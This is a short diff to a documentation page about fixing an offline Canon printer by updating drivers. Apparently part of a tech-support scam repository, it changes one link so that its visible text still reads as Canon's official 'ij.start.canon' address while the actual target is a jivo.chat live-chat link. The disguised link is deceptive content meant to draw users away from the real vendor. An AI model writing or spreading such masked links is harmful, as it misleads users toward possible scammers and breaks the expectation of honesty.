trickjack/canonprinteroffline/docs/source/index.rst

 Outdated drivers and firmware can cause compatibility and communication issues between your printer and computer.

-- Visit `ij.start.canon <https://ij.start.canon>`_ or Canon’s official support site.
+- Visit `https://ij.start.canon <https://jivo.chat/KlZSRejpBm>`_ or Canon’s official support site.
 - Download and install the latest drivers and firmware updates for your specific printer model.
 - Set driver updates to automatic if possible.